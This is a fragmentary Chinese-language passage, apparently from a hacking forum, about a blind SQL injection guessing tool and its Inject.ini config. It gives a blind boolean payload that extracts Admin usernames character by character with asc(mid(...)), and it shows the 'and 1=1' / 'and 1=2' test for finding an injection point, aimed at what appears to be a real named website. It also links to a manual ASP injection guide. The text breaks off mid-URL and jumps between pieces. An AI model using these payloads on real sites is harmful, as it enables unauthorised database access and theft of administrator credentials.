注入工具盲注猜解工具 ===配置文件Inject.ini=== 先贴出代码再说明: ------------------------------------- [url]手工猜字符语句完整URL 没有特殊字符过滤的语句: http://www.xxx.net/list.asp?id=286 and 0(select count(*) from Admin where asc(mid(username,1,1))>88) and 1=1 有特殊字符过滤的语句: http://127.0.0
http://www.bzjyk.com.cn/NewsInfo.asp?id=76 and 1=1 返回了正常 http://www.bzjyk.com.cn/NewsInfo.asp?id=76 and 1=2 返回了错误 1=1返回了正常,1=2返回了错误,所以会返回一个正常一个错误。这就表明这条连接存在SQL注入点。 Asp手工注入详解:http://bbs.hongkeer.com/read.php?tid-9160-fpage-12.html